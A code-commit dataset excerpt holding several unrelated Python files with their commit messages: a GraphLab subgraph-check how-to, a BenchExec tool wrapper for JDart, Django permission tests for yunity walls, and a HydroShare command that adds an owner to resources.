if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
Add how-to for checking if one graph is a subgraph of another.
|
Add how-to for checking if one graph is a subgraph of another.
|
Python
|
cc0-1.0
|
srikris/how-to,dato-code/how-to,nagyistoce/how-to-graphlab-create
|
Add how-to for checking if one graph is a subgraph of another.
|
# This technique works best if the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `subgraph` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
<commit_before><commit_msg>Add how-to for checking if one graph is a subgraph of another.<commit_after>
|
# This technique works best if the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `subgraph` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
Add how-to for checking if one graph is a subgraph of another.# This technique works best if the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `subgraph` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
<commit_before><commit_msg>Add how-to for checking if one graph is a subgraph of another.<commit_after># This technique works best if the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `subgraph` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
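For comparison, the same subset check in NetworkX (an alternative library, not used by this how-to) reduces to plain set containment:
# Hypothetical NetworkX equivalent of the subset check; not from the how-to.
import networkx as nx
def is_subgraph_nx(sub, g):
    return (set(sub.nodes()) <= set(g.nodes())
            and set(sub.edges()) <= set(g.edges()))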
|
|
b36e0ce911b35b3f1dccad9f616df72253ed9560
|
benchexec/tools/jdart.py
|
benchexec/tools/jdart.py
|
"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
Add Tool Info for JDart
|
Add Tool Info for JDart
|
Python
|
apache-2.0
|
dbeyer/benchexec,ultimate-pa/benchexec,ultimate-pa/benchexec,ultimate-pa/benchexec,ultimate-pa/benchexec,sosy-lab/benchexec,sosy-lab/benchexec,ultimate-pa/benchexec,sosy-lab/benchexec,dbeyer/benchexec,ultimate-pa/benchexec,dbeyer/benchexec,sosy-lab/benchexec,sosy-lab/benchexec,dbeyer/benchexec,sosy-lab/benchexec
|
Add Tool Info for JDart
|
"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
<commit_before><commit_msg>Add Tool Info for JDart<commit_after>
|
"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
Add Tool Info for JDart"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
<commit_before><commit_msg>Add Tool Info for JDart<commit_after>"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
|
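The determine_result loop above is a plain line scan in which a later marker overrides an earlier one; a standalone sketch of that behavior follows (the sample output lines and the inlined status strings are assumptions for illustration, standing in for the result.RESULT_* constants):
# Minimal sketch of the determine_result scan; sample lines and the
# inlined 'unknown'/'true'/'false' strings are illustrative assumptions.
def parse_status(output_lines):
    status = 'unknown'
    for line in output_lines:
        if '== ERROR' in line:
            status = 'false'  # stands in for result.RESULT_FALSE_PROP
        elif '== OK' in line:
            status = 'true'   # stands in for result.RESULT_TRUE_PROP
    return status
print(parse_status(['JDart run ...', '== OK']))     # true
print(parse_status(['JDart run ...', '== ERROR']))  # false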
bddb35ecbf7953c2b95f3db41fedd97199646e7b
|
yunity/tests/integration/test_permissions.py
|
yunity/tests/integration/test_permissions.py
|
from django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
Add basic permission system tests
|
Add basic permission system tests
Test some permissions on a user's wall.
with @nicksellen
|
Python
|
agpl-3.0
|
yunity/yunity-core,yunity/foodsaving-backend,yunity/foodsaving-backend,yunity/foodsaving-backend,yunity/yunity-core
|
Add basic permission system tests
Test some permissions on a user's wall.
with @nicksellen
|
from django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
<commit_before><commit_msg>Add basic permission system tests
Test some permissions on a user's wall.
with @nicksellen<commit_after>
|
from django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
Add basic permission system tests
Test some permissions on a user's wall.
with @nicksellenfrom django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
<commit_before><commit_msg>Add basic permission system tests
Test some permissions on a user's wall.
with @nicksellen<commit_after>from django.test import TestCase
from yunity.base.other_models import Group
from yunity.permissions.resolver import resolve_permissions
from yunity.users.models import ProfileVisibility
from yunity.utils.tests.mock import MockUser
from yunity.walls.models import Wall
class PermissionsTests(TestCase):
def setUp(self):
w = Wall.objects.create()
w2 = Wall.objects.create()
g = Group.objects.create(name='toplevel group 1')
ga = Group.objects.create(name='1a', parent=g)
gb = Group.objects.create(name='1b', parent=g)
gc = Group.objects.create(name='1c', parent=g)
gaa = Group.objects.create(name='1aa', parent=ga)
h = Group.objects.create(name='toplevel group 2')
ha = Group.objects.create(name='2a', parent=h)
hb = Group.objects.create(name='2b', parent=h)
hba = Group.objects.create(name='2ba', parent=hb)
t = gaa.hub
t.wall = w
t.save()
t = hb.hub
t.wall = w2
t.save()
def test_nothing(self):
pass
def test_user_wall_is_public_readable(self):
u = MockUser.create(profile_visibility=ProfileVisibility.PUBLIC)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.public, 'read', 'user wall not public readable')
def test_user_wall_is_community_readable_base(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='toplevel group 2').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
self.assertEqual(c.group_trees, [(g, 'read')], 'set of communities differs from communities user is part of')
def test_user_wall_is_community_readable_user_child(self):
u = MockUser.create(profile_visibility=ProfileVisibility.COMMUNITIES)
g = Group.objects.filter(name='2ba').first()
g.hub.hubmembership_set.create(user=u)
#self.assertNotEqual(u.wall, None)
c = resolve_permissions(u.wall)
community = Group.objects.filter(name='toplevel group 2').first()
self.assertEqual(c.group_trees, [(community, 'read')], 'set of communities differs from communities user is part of')
|
|
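The final test implies that membership in a nested group ('2ba') resolves to its top-level ancestor ('toplevel group 2'); a sketch of that parent walk follows (a hypothetical top_level helper with a stand-in class, which may differ from what resolve_permissions actually does):
# Sketch of walking the parent chain to the top-level group, as the
# '2ba' -> 'toplevel group 2' assertion expects. Hypothetical helper;
# G is a stand-in for the Group model.
class G:
    def __init__(self, name, parent=None):
        self.name, self.parent = name, parent
def top_level(group):
    while group.parent is not None:
        group = group.parent
    return group
h = G('toplevel group 2')
hba = G('2ba', parent=G('2b', parent=h))
print(top_level(hba).name)  # toplevel group 2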
6ecb2fc93c183e7a2c6574de25cf3d0a2fe66fe7
|
hs_core/management/commands/add_owner.py
|
hs_core/management/commands/add_owner.py
|
""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
Add an owner to an existing resource.
|
Add an owner to an existing resource.
|
Python
|
bsd-3-clause
|
hydroshare/hydroshare,hydroshare/hydroshare,hydroshare/hydroshare,hydroshare/hydroshare,hydroshare/hydroshare
|
Add an owner to an existing resource.
|
""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
<commit_before><commit_msg>Add an owner to an existing resource.<commit_after>
|
""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
Add an owner to an existing resource.""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
<commit_before><commit_msg>Add an owner to an existing resource.<commit_after>""" Add an owner to a resource or resources
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid)
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
else:
print("No resource list specified.")
|
|
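As a standard Django management command taking one username followed by a variable number of resource ids, it can also be driven programmatically (the username and resource id below are placeholder values):
# Invocation sketch via Django's call_command; 'jdoe' and the resource
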